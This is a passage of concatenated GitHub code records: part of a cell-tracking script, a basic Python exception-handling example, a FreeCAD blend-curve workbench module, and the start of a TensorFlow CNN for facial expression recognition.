in self.cells:\n positions = cell.positions\n values = [positions[i] for i in range(25) if positions[i] != [0, 0]]\n frames = [i for i in range(25) if positions[i] != [0, 0]]\n missing_frames = [i for i in range(25) if positions[i] == [0, 0]]\n\n if len(frames) > len(missing_frames):\n x_coords, y_coords = zip(*values)\n interp = interp1d(x=frames, y=x_coords, kind=\"nearest\", fill_value=\"extrapolate\")\n x_interpolated = interp(missing_frames)\n\n interp = interp1d(frames, y_coords, kind=\"nearest\", fill_value=\"extrapolate\")\n y_interpolated = interp(missing_frames)\n\n interpolated = values + list(map(list, zip(x_interpolated, y_interpolated)))\n frames = frames + missing_frames\n sorted_interpolated = [x for _, x in sorted(zip(frames, interpolated))]\n\n cell.positions = sorted_interpolated\n\n def find_zero_sublist(self, lst: list) ->list:\n all = []\n nb_zero = 0\n start = [0, 0]\n start_index = 0\n \n for index, elem in enumerate(lst):\n if (start != [0, 0]) and (elem != [0, 0]):\n if nb_zero == 0:\n start = elem\n start_index = index\n \n else:\n all.append((start_index, [start] + [[0, 0]] * nb_zero + [elem]))\n start = [0, 0]\n \n if (start == [0, 0]) and (elem != [0, 0]):\n nb_zero = 0\n start = elem\n start_index = index\n \n if (start != [0, 0]) and (elem == [0, 0]):\n nb_zero += 1\n \n return all\n\n def fill_gap_positions(self):\n for cell in self.cells:\n zero_sublist = self.find_zero_sublist(cell.positions)\n for elem in zero_sublist:\n index, lst = elem\n new_pos = np.round(np.linspace(lst[0], lst[-1], len(lst)), 6).tolist()\n for coord in new_pos:\n cell.positions[index] = coord\n index += 1\n\n def get_pickle(self):\n cells_path = {}\n for cell in self.cells:\n if [0, 0] not in cell.positions:\n cells_path.update({cell.number_id: cell.positions})\n\n with open(r'data\\track\\result.pickle', 'wb') as f:\n pickle.dump(cells_path, f)","repo_name":"MWalbecq/SpermAnalysis","sub_path":"src/tracking/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29011942114","text":"'''\ntry:\n output = 10/0\n num=int(input(\"Enter a number\"))\n\nexcept:\n print (\"invalid input\")\n '''\ntry:\n output = 10/0\n num=int(input(\"Enter a number\"))\n\nexcept ZeroDivisionError as err:\n print (err)\n\nexcept ValueError as err1:\n print (err1)\n\nprint (\"cross check if other statements print or not\")\n","repo_name":"soniaM7/Python_basics","sub_path":"com/automation/try_catch.py","file_name":"try_catch.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19928533098","text":"# -*- coding: utf-8 -*-\n\n__title__ = \"Blend curve\"\n__author__ = \"Christophe Grellier (Chris_G)\"\n__license__ = \"LGPL 2.1\"\n__doc__ = \"Blend curve between two edges. 
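fill_gap_positions in the tracker above relies on np.linspace accepting array endpoints, so a run of [0, 0] placeholders is replaced by a straight-line interpolation between the two known positions. A minimal sketch with a hypothetical one-frame gap:

import numpy as np

# One known start, one missing frame, one known end (hypothetical positions).
start, end = [0.0, 0.0], [6.0, 9.0]
filled = np.round(np.linspace(start, end, 3), 6).tolist()
print(filled)  # [[0.0, 0.0], [3.0, 4.5], [6.0, 9.0]]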
Double-clic object to enable/disable freehand mouse editing.\"\n\nimport os\nimport FreeCAD\nimport FreeCADGui\nimport Part\nfrom freecad.Curves import _utils\nfrom freecad.Curves import ICONPATH\n\nfrom pivy import coin\n# from freecad.Curves import nurbs_tools\nfrom freecad.Curves import blend_curve\nfrom freecad.Curves import CoinNodes\nfrom freecad.Curves import graphics\nfrom freecad.Curves import manipulators\n\nTOOL_ICON = os.path.join(ICONPATH, 'blend1.svg')\n# debug = _utils.debug\ndebug = _utils.doNothing\n\nif not blend_curve.CAN_MINIMIZE:\n __doc__ += \"\\nInstall 'scipy' python package for AutoScale feature\"\n\n\nclass BlendCurveFP:\n def __init__(self, obj, edges):\n debug(\"BlendCurve class Init\")\n obj.addProperty(\"App::PropertyLinkSub\", \"Edge1\", \"Edge1\", \"Edge 1\").Edge1 = edges[0]\n obj.addProperty(\"App::PropertyLinkSub\", \"Edge2\", \"Edge2\", \"Edge 2\").Edge2 = edges[1]\n # obj.addProperty(\"App::PropertyInteger\", \"DegreeMax\", \"BlendCurve\", \"Max degree of the Blend curve\").DegreeMax = 9\n obj.addProperty(\"App::PropertyDistance\", \"Parameter1\", \"Edge1\", \"Location on first edge\")\n obj.addProperty(\"App::PropertyBool\", \"Reverse1\", \"Edge1\", \"Reverse Edge\").Reverse1 = False\n obj.addProperty(\"App::PropertyFloatConstraint\", \"Scale1\", \"Edge1\", \"Scale of blend curve\")\n obj.addProperty(\"App::PropertyEnumeration\", \"Continuity1\", \"Edge1\", \"Continuity\").Continuity1 = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n obj.addProperty(\"App::PropertyDistance\", \"Parameter2\", \"Edge2\", \"Location on second edge\")\n obj.addProperty(\"App::PropertyBool\", \"Reverse2\", \"Edge2\", \"Reverse Edge\").Reverse2 = False\n obj.addProperty(\"App::PropertyFloatConstraint\", \"Scale2\", \"Edge2\", \"Scale of blend curve\")\n obj.addProperty(\"App::PropertyEnumeration\", \"Continuity2\", \"Edge2\", \"Continuity\").Continuity2 = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n obj.addProperty(\"App::PropertyVectorList\", \"CurvePts\", \"BlendCurve\", \"Poles of the Bezier curve\")\n obj.addProperty(\"App::PropertyEnumeration\", \"Output\", \"BlendCurve\", \"Output type\").Output = [\"Wire\", \"Joined\", \"Single\"]\n obj.addProperty(\"App::PropertyBool\", \"AutoScale\", \"BlendCurve\", \"Compute scales to get minimal curvature along curve\").AutoScale = False\n obj.Scale1 = (1., -5.0, 5.0, 0.05)\n obj.Scale2 = (1., -5.0, 5.0, 0.05)\n obj.setEditorMode(\"CurvePts\", 2)\n obj.Proxy = self\n\n def check_minimize(self, fp):\n if blend_curve.CAN_MINIMIZE:\n fp.setEditorMode(\"AutoScale\", 0)\n else:\n FreeCAD.Console.PrintWarning(\"BlendCurve: Install 'scipy' python package for AutoScale feature\\n\")\n fp.setEditorMode(\"AutoScale\", 2)\n\n def getShape(self, fp, prop):\n sub = None\n if hasattr(fp, prop) and fp.getPropertyByName(prop):\n obj, senl = fp.getPropertyByName(prop)\n for sen in senl:\n if (\"Edge\" in sen) or (\"Line\" in sen):\n sh = obj.Shape.copy()\n sh.Placement = obj.getGlobalPlacement()\n sub = sh.getElement(sen)\n break\n return sub\n\n def migrate(self, fp):\n if hasattr(fp, \"DegreeMax\"):\n fp.removeProperty(\"DegreeMax\")\n if not hasattr(fp, \"AutoScale\"):\n fp.addProperty(\"App::PropertyBool\", \"AutoScale\", \"BlendCurve\",\n \"Compute scales to get minimal curvature along curve\").AutoScale = False\n if not hasattr(fp, \"Reverse1\"):\n fp.addProperty(\"App::PropertyBool\", \"Reverse1\", \"Edge1\", \"Reverse Edge\").Reverse1 = False\n if not hasattr(fp, \"Reverse2\"):\n fp.addProperty(\"App::PropertyBool\", \"Reverse2\", \"Edge2\", 
\"Reverse Edge\").Reverse2 = False\n if fp.getTypeIdOfProperty(\"Parameter1\") == \"App::PropertyFloatConstraint\":\n e1 = self.getShape(fp, \"Edge1\")\n val = fp.Parameter1 * e1.Length\n fp.removeProperty(\"Parameter1\")\n fp.addProperty(\"App::PropertyDistance\", \"Parameter1\", \"Edge1\", \"Location on first edge\")\n fp.Parameter1 = val\n if fp.getTypeIdOfProperty(\"Parameter2\") == \"App::PropertyFloatConstraint\":\n e2 = self.getShape(fp, \"Edge2\")\n val = fp.Parameter2 * e2.Length\n fp.removeProperty(\"Parameter2\")\n fp.addProperty(\"App::PropertyDistance\", \"Parameter2\", \"Edge1\", \"Location on second edge\")\n fp.Parameter2 = val\n\n def compute(self, fp):\n e1 = self.getShape(fp, \"Edge1\")\n e2 = self.getShape(fp, \"Edge2\")\n r1 = fp.Parameter1\n if fp.Reverse1:\n r1 = -r1\n if r1 == 0:\n r1 = 1e50\n r2 = fp.Parameter2\n if fp.Reverse2:\n r2 = -r2\n if r2 == 0:\n r2 = 1e50\n if e1 and e2:\n # p1 = e1.getParameterByLength(fp.Parameter1)\n # p2 = e2.getParameterByLength(fp.Parameter2)\n c1 = blend_curve.PointOnEdge(e1)\n c1.distance = r1\n c1.continuity = self.getContinuity(fp.Continuity1)\n # c1.scale = fp.Scale1\n c2 = blend_curve.PointOnEdge(e2)\n c2.distance = r2\n c2.continuity = self.getContinuity(fp.Continuity2)\n # c2.scale = fp.Scale2\n bc = blend_curve.BlendCurve(c1, c2)\n bc.nb_samples = 200\n # bc.auto_scale()\n bc.scale1 = fp.Scale1\n bc.scale2 = fp.Scale2\n bc.perform()\n return bc\n\n def execute(self, fp):\n bc = self.compute(fp)\n if (bc is None) or (bc.curve is None):\n fp.CurvePts = []\n fp.Shape = Part.Shape()\n return None\n if fp.AutoScale:\n bc.scale1 = .01\n bc.scale2 = .01\n bc.auto_orient()\n bc.minimize_curvature()\n fp.Scale1 = bc.scale1\n fp.Scale2 = bc.scale2\n fp.CurvePts = bc.curve.getPoles()\n if fp.Output in [\"Wire\", \"Joined\"]:\n w = Part.Wire(bc.point1.rear_segment() + [bc.shape] + bc.point2.front_segment())\n if fp.Output == \"Joined\":\n w = w.approximate(1e-7, 1e-7, 99, 9).toShape()\n else:\n w = bc.shape\n fp.Shape = w\n\n def onChanged(self, fp, prop):\n if 'Restore' in fp.State:\n return\n if prop == \"AutoScale\" and fp.AutoScale:\n fp.setEditorMode(\"Scale1\", 2)\n fp.setEditorMode(\"Scale2\", 2)\n if prop == \"AutoScale\" and not fp.AutoScale:\n fp.setEditorMode(\"Scale1\", 0)\n fp.setEditorMode(\"Scale2\", 0)\n elif prop == \"Scale1\":\n if fp.Scale1 == 0:\n fp.Scale1 = 0.0001\n if not fp.AutoScale:\n self.execute(fp)\n elif prop == \"Scale2\":\n if fp.Scale2 == 0:\n fp.Scale2 = 0.0001\n if not fp.AutoScale:\n self.execute(fp)\n elif prop == \"Parameter1\":\n e1 = self.getShape(fp, \"Edge1\")\n if fp.Parameter1 > e1.Length:\n fp.Parameter1 = e1.Length\n elif fp.Parameter1 < 0.0:\n fp.Parameter1 = 0.0\n elif prop == \"Parameter2\":\n e2 = self.getShape(fp, \"Edge2\")\n if fp.Parameter2 > e2.Length:\n fp.Parameter2 = e2.Length\n elif fp.Parameter2 < 0.0:\n fp.Parameter2 = 0.0\n if prop in (\"Parameter1\", \"Parameter2\",\n \"Continuity1\", \"Continuity2\"\n \"Output\"):\n self.execute(fp)\n\n def onDocumentRestored(self, fp):\n debug(\"{} restored !\".format(fp.Label))\n fp.setEditorMode(\"CurvePts\", 2)\n self.check_minimize(fp)\n self.migrate(fp)\n\n def getContinuity(self, cont):\n if cont == \"C0\":\n return 0\n elif cont == \"G1\":\n return 1\n elif cont == \"G2\":\n return 2\n elif cont == \"G3\":\n return 3\n else:\n return 4\n\n\nclass pointEditor(object):\n \"\"\"Interpolation curve free-hand editor\n my_editor = pointEditor([points],obj)\n obj is the FreeCAD object that will receive\n the curve shape at the end of 
editing.\n points can be :\n - Vector (free point)\n - (Vector, shape) (point on shape)\"\"\"\n def __init__(self, points=[], fp=None):\n self.points = list()\n self.fp = fp\n self.curve = None\n self.root_inserted = False\n self.ctrl_keys = {\"i\": [self.insert],\n \"v\": [self.text_change],\n \"q\": [self.quit],\n \"\\uffff\": [self.remove_point]}\n for p in points:\n if isinstance(p, FreeCAD.Vector):\n self.points.append(manipulators.ShapeSnap(p))\n elif isinstance(p, (tuple, list)):\n self.points.append(manipulators.ShapeSnap(p[0], p[1]))\n elif isinstance(p, manipulators.ShapeSnap):\n self.points.append(p)\n elif isinstance(p, manipulators.CustomText):\n self.points.append(p)\n else:\n FreeCAD.Console.PrintError(\"pointEditor : bad input\")\n for p in points:\n if hasattr(p, \"ctrl_keys\"):\n for key in p.ctrl_keys:\n if key in self.ctrl_keys:\n # print(key)\n self.ctrl_keys[key].extend(p.ctrl_keys[key])\n else:\n self.ctrl_keys[key] = p.ctrl_keys[key]\n # Setup coin objects\n if self.fp:\n self.guidoc = self.fp.ViewObject.Document\n else:\n if not FreeCADGui.ActiveDocument:\n self.guidoc = FreeCAD.newDocument(\"New\")\n self.guidoc = FreeCADGui.ActiveDocument\n self.view = self.guidoc.ActiveView\n self.rm = self.view.getViewer().getSoRenderManager()\n self.sg = self.view.getSceneGraph()\n self.setup_InteractionSeparator()\n\n def setup_InteractionSeparator(self):\n if self.root_inserted:\n self.sg.removeChild(self.root)\n self.root = graphics.InteractionSeparator(self.rm)\n self.root.setName(\"InteractionSeparator\")\n # self.root.ovr_col = \"yellow\"\n # self.root.sel_col = \"green\"\n self.root.pick_radius = 40\n # self.root.on_drag.append(self.update_curve)\n # Keyboard callback\n # self.events = coin.SoEventCallback()\n self._controlCB = self.root.events.addEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self.controlCB)\n # populate root node\n # self.root.addChild(self.events)\n self.root += self.points\n self.build_lines()\n self.root += self.lines\n # set FreeCAD color scheme\n for o in self.points: # + self.lines:\n o.ovr_col = \"yellow\"\n o.sel_col = \"green\"\n self.root.register()\n self.sg.addChild(self.root)\n self.root_inserted = True\n self.root.selected_objects = list()\n\n def build_lines(self):\n self.lines = list()\n for m in self.points:\n if isinstance(m, manipulators.TangentSnap):\n line = manipulators.Line([m.parent, m])\n line.dynamic = False\n line.set_color(\"blue\")\n self.lines.append(line)\n\n def controlCB(self, attr, event_callback):\n event = event_callback.getEvent()\n if event.getState() == event.UP:\n # FreeCAD.Console.PrintMessage(\"Key pressed : %s\\n\"%event.getKey())\n if chr(event.getKey()) in self.ctrl_keys:\n for foo in self.ctrl_keys[chr(event.getKey())]:\n if foo.__self__ is self:\n foo()\n elif foo.__self__.parent in self.root.selected_objects:\n foo()\n\n def remove_point(self):\n pts = list()\n for o in self.root.dynamic_objects:\n if isinstance(o, manipulators.Object3D):\n pts.append(o)\n self.points = pts\n self.setup_InteractionSeparator()\n\n def insert(self):\n # get selected lines and subdivide them\n # pts = []\n for o in self.root.selected_objects:\n # p1 = o.points[0]\n mark = manipulators.ShapeSnap(o.points, o.snap_shape)\n self.points.append(mark)\n # new_select.append(mark)\n # self.points.append(pts)\n self.setup_InteractionSeparator()\n # self.root.selected_objects = new_select\n return True\n\n def text_change(self):\n for o in self.root.selected_objects:\n if o._text_type == 2:\n o._text_type = 0\n else:\n 
o._text_type += 1\n\n def quit(self):\n self.root.events.removeEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self._controlCB)\n self.root.unregister()\n # self.root.removeAllChildren()\n self.sg.removeChild(self.root)\n self.root_inserted = False\n\n\nclass BlendCurveVP:\n def __init__(self, vobj):\n vobj.Proxy = self\n self.select_state = True\n self.active = False\n self.ps = 1.0\n\n def getIcon(self):\n return(TOOL_ICON)\n\n def attach(self, vobj):\n self.Object = vobj.Object\n self.active = False\n self.select_state = vobj.Selectable\n self.ps = 1.0\n self.ip = None\n\n def get_length(self, edge, point):\n try:\n return edge.Curve.toShape(edge.FirstParameter, edge.Curve.parameter(point)).Length\n except Part.OCCError:\n return 0.0\n\n def get_param(self, edge, point):\n try:\n return edge.Curve.parameter(point)\n except Part.OCCError:\n return 0.0\n\n def update_shape(self):\n e1 = self.Object.Proxy.getShape(self.Object, \"Edge1\")\n e2 = self.Object.Proxy.getShape(self.Object, \"Edge2\")\n if self.bc:\n # self.bc.constraints = []\n # bc = nurbs_tools.blendCurve(e1, e2)\n v = Part.Vertex(self.m1.point)\n proj = v.distToShape(self.m1.snap_shape)[1][0][1]\n param1 = self.get_param(e1, proj) # self.get_length(e1, proj)\n # bc.param1 = (pa1 - self.m1.snap_shape.FirstParameter) / (self.m1.snap_shape.LastParameter - self.m1.snap_shape.FirstParameter)\n cont1 = self.Object.Proxy.getContinuity(self.c1.text[0])\n self.bc.point1 = blend_curve.PointOnEdge(e1, param1, cont1)\n self.bc.scale1 = self.t1.parameter\n\n v = Part.Vertex(self.m2.point)\n proj = v.distToShape(self.m2.snap_shape)[1][0][1]\n param2 = self.get_param(e2, proj) # self.get_length(e2, proj)\n # bc.param2 = (pa2 - self.m2.snap_shape.FirstParameter) / (self.m2.snap_shape.LastParameter - self.m2.snap_shape.FirstParameter)\n cont2 = self.Object.Proxy.getContinuity(self.c2.text[0])\n self.bc.point2 = blend_curve.PointOnEdge(e2, param2, cont2)\n self.bc.scale2 = -self.t2.parameter\n\n self.bc.perform()\n self.Object.Shape = self.bc.shape\n for obj in self.Object.InList:\n if \"Curves.ParametricComb.Comb\" in str(obj.Proxy):\n obj.Proxy.execute(obj)\n return self.bc\n\n def setEdit(self, vobj, mode=0):\n debug(\"BlendCurve Edit mode = {}\".format(mode))\n if mode == 0:\n if vobj.Selectable:\n self.select_state = True\n vobj.Selectable = False\n self.ps = vobj.PointSize\n vobj.PointSize = 0.0\n pts = list()\n self.bc = self.Object.Proxy.compute(self.Object)\n\n # e1 = self.getShape(self.Object, \"Edge1\", \"Edge\")\n # e2 = self.getShape(self.Object, \"Edge2\", \"Edge\")\n # pa1 = e1.getParameterByLength(self.Object.Parameter1)\n # pa2 = e2.getParameterByLength(self.Object.Parameter2)\n\n d = self.bc.point1.point.distanceToPoint(self.bc.point2.point)\n\n self.m1 = manipulators.EdgeSnapAndTangent(self.bc.point1.point, self.bc.point1.edge)\n self.m1.set_color(\"cyan\")\n self.m1.marker.markerIndex = coin.SoMarkerSet.CIRCLE_LINE_9_9\n pts.append(self.m1)\n self.c1 = manipulators.CycleText(self.m1)\n self.c1.text_list = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n self.c1.text = self.Object.Continuity1\n self.c1.show()\n pts.append(self.c1)\n\n self.t1 = manipulators.TangentSnap(self.m1)\n self.t1._scale = d / 3.0\n self.t1.parameter = self.Object.Scale1\n pts.append(self.t1)\n self.tt1 = manipulators.ParameterText(self.t1)\n self.tt1.show()\n pts.append(self.tt1)\n\n self.m2 = manipulators.EdgeSnapAndTangent(self.bc.point2.point, self.bc.point2.edge)\n self.m2.set_color(\"red\")\n self.m2.marker.markerIndex = 
coin.SoMarkerSet.CIRCLE_LINE_9_9\n pts.append(self.m2)\n self.c2 = manipulators.CycleText(self.m2)\n self.c2.text_list = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n self.c2.text = self.Object.Continuity2\n self.c2.show()\n pts.append(self.c2)\n\n self.t2 = manipulators.TangentSnap(self.m2)\n self.t2._scale = d / 3.0\n self.t2.parameter = -self.Object.Scale2\n pts.append(self.t2)\n self.tt2 = manipulators.ParameterText(self.t2)\n self.tt2.show()\n pts.append(self.tt2)\n\n self.ip = pointEditor(pts, self.Object)\n debug(\"pointEditor created\\n\")\n self.ip.root.on_drag.append(self.update_shape)\n self.active = True\n return True\n return False\n\n def unsetEdit(self, vobj, mode=0):\n e1 = self.Object.Proxy.getShape(self.Object, \"Edge1\")\n e2 = self.Object.Proxy.getShape(self.Object, \"Edge2\")\n if isinstance(self.ip, pointEditor):\n v = Part.Vertex(self.m1.point)\n proj = v.distToShape(self.m1.snap_shape)[1][0][1]\n # pa1 = e1.Curve.parameter(proj)\n self.Object.Parameter1 = self.get_length(e1, proj) # e1.Curve.toShape(e1.FirstParameter, pa1).Length\n self.Object.Scale1 = self.t1.parameter\n self.Object.Continuity1 = self.c1.text[0]\n\n v = Part.Vertex(self.m2.point)\n proj = v.distToShape(self.m2.snap_shape)[1][0][1]\n # pa2 = e2.Curve.parameter(proj)\n # self.Object.Parameter2 = (pa2 - self.m2.snap_shape.FirstParameter) / (self.m2.snap_shape.LastParameter - self.m2.snap_shape.FirstParameter)\n self.Object.Parameter2 = self.get_length(e2, proj) # e2.Curve.toShape(e2.FirstParameter, pa2).Length\n self.Object.Scale2 = -self.t2.parameter\n self.Object.Continuity2 = self.c2.text[0]\n\n vobj.Selectable = self.select_state\n vobj.PointSize = self.ps\n self.ip.quit()\n self.ip = None\n self.active = False\n # vobj.Visibility = True\n return True\n\n def doubleClicked(self, vobj):\n if not hasattr(self, 'active'):\n self.active = False\n if not self.active:\n self.active = True\n # self.setEdit(vobj)\n vobj.Document.setEdit(vobj)\n else:\n vobj.Document.resetEdit()\n self.active = False\n FreeCAD.ActiveDocument.recompute()\n return True\n\n def __getstate__(self):\n return {\"name\": self.Object.Name}\n\n def __setstate__(self, state):\n self.Object = FreeCAD.ActiveDocument.getObject(state[\"name\"])\n return None\n\n def getChildren(self):\n return [self.Object.Edge1[0], self.Object.Edge2[0]]\n\n # def claimChildren(self):\n # return self.getChildren()\n\n\nclass oldBlendCurveVP:\n def __init__(self, obj):\n debug(\"VP init\")\n obj.Proxy = self\n self.build()\n # self.children = []\n\n def claimChildren(self):\n if hasattr(self, \"children\"):\n return(self.children)\n else:\n return []\n\n def build(self):\n self.active = False\n if not hasattr(self, 'switch'):\n self.sg = FreeCADGui.ActiveDocument.ActiveView.getSceneGraph()\n self.switch = coin.SoSwitch()\n if hasattr(self, 'Object'):\n self.switch.setName(\"{}_ControlPoints\".format(self.Object.Name))\n self.empty = coin.SoSeparator() # Empty node\n self.node = coin.SoSeparator()\n self.coord = CoinNodes.coordinate3Node()\n self.poly = CoinNodes.polygonNode((0.5, 0.5, 0.5), 1)\n self.marker = CoinNodes.markerSetNode((1, 0, 0), coin.SoMarkerSet.DIAMOND_FILLED_7_7)\n self.node.addChild(self.coord)\n self.node.addChild(self.poly)\n self.node.addChild(self.marker)\n self.switch.addChild(self.empty)\n self.switch.addChild(self.node)\n self.sg.addChild(self.switch)\n\n def setVisi(self, objs, vis):\n for o in objs:\n o.ViewObject.Visibility = vis\n\n def attach(self, vobj):\n debug(\"VP attach\")\n self.Object = vobj.Object\n self.children = []\n 
# self.claimed = False\n\n def updateData(self, fp, prop):\n if prop == \"CurvePts\":\n if hasattr(self, 'coord') and hasattr(self, 'poly'):\n self.coord.points = fp.CurvePts\n self.poly.vertices = self.coord.points\n self.marker.color = [(1, 0, 0)] * (len(fp.CurvePts) - 1) + [(1, 1, 0)]\n elif prop == \"Output\":\n if fp.Output in (\"Wire\", \"Joined\"):\n if self.children == []:\n if fp.Edge1[0] == fp.Edge2[0]:\n self.children = [fp.Edge1[0]]\n else:\n self.children = [fp.Edge1[0], fp.Edge2[0]]\n self.setVisi(self.children, False)\n # self.claimed = True\n else:\n if not self.children == []:\n self.setVisi(self.children, True)\n # self.claimed = True\n self.children = []\n\n def onChanged(self, vp, prop):\n if prop == \"Visibility\":\n if (vp.Visibility is True) and (self.active is True):\n self.switch.whichChild = 1\n elif (vp.Visibility is False) and (self.active is True):\n self.switch.whichChild = 0\n\n def doubleClicked(self, vobj):\n if not hasattr(self, 'active'):\n self.active = False\n if not self.active:\n self.active = True\n if (vobj.Visibility is True):\n self.switch.whichChild = 1\n else:\n self.active = False\n self.switch.whichChild = 0\n # self.Object.DegreeMax = self.Object.DegreeMax\n self.Object.Document.recompute()\n return True\n\n def setEdit(self, vobj, mode):\n debug(\"Start Edit\")\n return True\n\n def unsetEdit(self, vobj, mode):\n debug(\"End Edit\")\n return True\n\n def getIcon(self):\n # if self.active:\n # return(_utils.iconsPath() + '/blend2.svg')\n return TOOL_ICON\n\n def __getstate__(self):\n return({\"name\": self.Object.Name})\n\n def __setstate__(self, state):\n debug(\"setstate\")\n self.Object = FreeCAD.ActiveDocument.getObject(state[\"name\"])\n self.build()\n return None\n\n def onDelete(self, feature, subelements):\n if hasattr(self, 'active'):\n if self.active:\n self.sg.removeChild(self.switch)\n return True\n\n\nclass ParametricBlendCurve:\n \"\"\"Prepare selection and create blendCurve FeaturePython object.\"\"\"\n def getEdge(self, edge):\n if \"Line\" in edge[1]:\n return edge[0].Shape\n n = eval(edge[1].lstrip('Edge'))\n return edge[0].Shape.Edges[n - 1]\n\n def normalizedParam(self, edge, par, endClamp=False):\n e = self.getEdge(edge)\n goodpar = (par - e.FirstParameter) * 1.0 / (e.LastParameter - e.FirstParameter)\n if endClamp:\n if goodpar < 0.1:\n goodpar = 0.0\n elif goodpar > 0.9:\n goodpar = 1.0\n return goodpar\n\n def get_distance(self, edge, par, endClamp=False):\n e = self.getEdge(edge)\n ne = e.Curve.toShape(e.FirstParameter, par)\n dist = ne.Length\n if endClamp:\n if dist / e.Length < 0.05:\n dist = 0.0\n elif dist / e.Length > 0.95:\n dist = e.Length\n return dist\n\n def parseSel(self, selectionObject):\n res = []\n param = []\n for obj in selectionObject:\n for i in range(len(obj.SubObjects)):\n so = obj.SubObjects[i]\n if isinstance(so, Part.Edge):\n res.append([obj.Object, obj.SubElementNames[i]])\n p = obj.PickedPoints[i]\n poe = so.distToShape(Part.Vertex(p))\n par = poe[2][0][2]\n param.append(par)\n return res, param\n\n def line(self, ed, p):\n e = self.getEdge(ed)\n pt = e.valueAt(p)\n t = e.tangentAt(p).multiply(100000)\n line = Part.LineSegment(pt, pt.add(t)).toShape()\n return line\n\n #def getOrientation(self, e1, p1, e2, p2):\n #r1 = -1.0\n #r2 = 1.0\n #l1 = self.line(e1, p1)\n #l2 = self.line(e2, p2)\n #dts = l1.distToShape(l2)\n #par1 = dts[2][0][2]\n #par2 = dts[2][0][5]\n #if par1:\n #r1 = 1.0\n #if par2:\n #r2 = -1.0\n #return r1, r2\n\n def Activated(self):\n s = 
FreeCADGui.Selection.getSelectionEx()\n edges, param = self.parseSel(s)\n if len(edges) > 1:\n for j in range(int(len(edges) / 2)):\n i = j * 2\n obj = FreeCAD.ActiveDocument.addObject(\"Part::FeaturePython\", \"Blend Curve\")\n BlendCurveFP(obj, edges[i: i + 2])\n BlendCurveVP(obj.ViewObject)\n obj.Parameter1 = self.get_distance(edges[i], param[i], True)\n obj.Parameter2 = self.get_distance(edges[i + 1], param[i + 1], True)\n obj.Continuity1 = \"G1\"\n obj.Continuity2 = \"G1\"\n obj.Output = \"Single\"\n #ori1, ori2 = self.getOrientation(edges[i], param[i], edges[i + 1], param[i + 1])\n #obj.Scale1 = ori1\n #obj.Scale2 = ori2\n bc = obj.Proxy.compute(obj)\n bc.auto_scale()\n bc.minimize_curvature()\n obj.Scale1 = bc.point1.size\n obj.Scale2 = bc.point2.size\n FreeCAD.ActiveDocument.recompute()\n\n def GetResources(self):\n return {'Pixmap': TOOL_ICON,\n 'MenuText': __title__,\n 'ToolTip': __doc__}\n\n\nFreeCADGui.addCommand('ParametricBlendCurve', ParametricBlendCurve())\n","repo_name":"tomate44/CurvesWB","sub_path":"freecad/Curves/ParametricBlendCurve.py","file_name":"ParametricBlendCurve.py","file_ext":"py","file_size_in_byte":27210,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"61"} +{"seq_id":"4043413154","text":"#Nicholas McKillip -class on convolutional neural netwroks \n# on the fer2013 facial expression recognition dataset\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom util import getData, y2indicator, error_rate, init_weight_and_bias, getImageData, init_filter\nfrom sklearn.utils import shuffle\n\nclass ConvPoolLayer(object):\n\tdef __init__(self, mi, mo, fw=5, fh=5, poolsz=(2,2)):\n\t\tsz = (fw, fh, mi, mo)\n\t\tW0 = init_filter(sz, poolsz)\n\t\tself.W = tf.Variable(W0)\n\t\tb0 = np.zeros(mo, dtype = np.float32)\n\t\tself.b = tf.Variable(b0)\n\t\tself.poolsz = poolsz\n\t\tself.params = [self.W, self.b]\n\n\tdef forward(self, X):\n\t\tconv_out = tf.nn.conv2d(X, self.W, strides = [1, 1, 1, 1], padding = 'SAME')\n\t\tconv_out = tf.nn.bias_add(conv_out, self.b)\n\t\tpool_out = tf.nn.max_pool(conv_out, ksize=[1,2,2,1], strides=[1,2,2,1],padding = 'SAME')\n\t\treturn tf.tanh(pool_out)\n\n\nclass HiddenLayer(object):\n\tdef __init__(self, M1, M2, an_id):\n\t\tself.id = an_id\n\t\tself.M1 = M1\n\t\tself.M2 = M2\n\t\tW, b = init_weight_and_bias(int(M1), int(M2))\n\t\tself.W = tf.Variable(W.astype(np.float32))\n\t\tself.b = tf.Variable(b.astype(np.float32))\n\t\tself.params = [self.W, self.b]\n\n\tdef forward(self,X):\n\t\treturn tf.nn.relu(tf.matmul(X, self.W) + self.b)\n\nclass CNN(object):\n\tdef __init__(self, convpool_layer_sizes, hidden_layer_sizes):\n\t\tself.convpool_layer_sizes = convpool_layer_sizes\n\t\tself.hidden_layer_sizes = hidden_layer_sizes\n\n\tdef fit(self, X, Y, lr = 10e-4, mu =0.99, decay = 0.999, reg = 10e-3 , epochs = 3, batch_sz = 32, show_fig = True):\n\t\tlr = np.float32(lr)\n\t\tmu = np.float32(mu)\n\t\treg = np.float32(reg)\n\t\tdecay = np.float32(decay)\n\t\tK = len(set(Y))\n\n\t\t# make a validation set\n\t\tX, Y = shuffle(X, Y)\n\t\tX = X.astype(np.float32)\n\t\tY = y2indicator(Y).astype(np.float32)\n\t\tXvalid, Yvalid = X[-1000:], Y[-1000:]\n\t\tYvalid_flat = np.argmax(Yvalid, axis = 1)\n\t\tX, Y = X[:-1000], Y[:-1000]\n\n\t\tN, d, d, c = X.shape\n\t\tmi = c\n\t\toutw = d\n\t\touth = d\n\t\tself.convpool_layers = []\n\t\tfor mo, fw, fh in self.convpool_layer_sizes:\n\t\t\tlayer = ConvPoolLayer(mi, mo, fw, 
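Outside FreeCAD, the geometric core of a G1 blend like the one above is a cubic Hermite segment: it joins two points with prescribed tangents, and the tangent lengths play the role of Scale1/Scale2. A dependency-free sketch (all numbers hypothetical):

def hermite(p0, t0, p1, t1, u):
    # Standard cubic Hermite basis functions.
    h00 = 2 * u**3 - 3 * u**2 + 1
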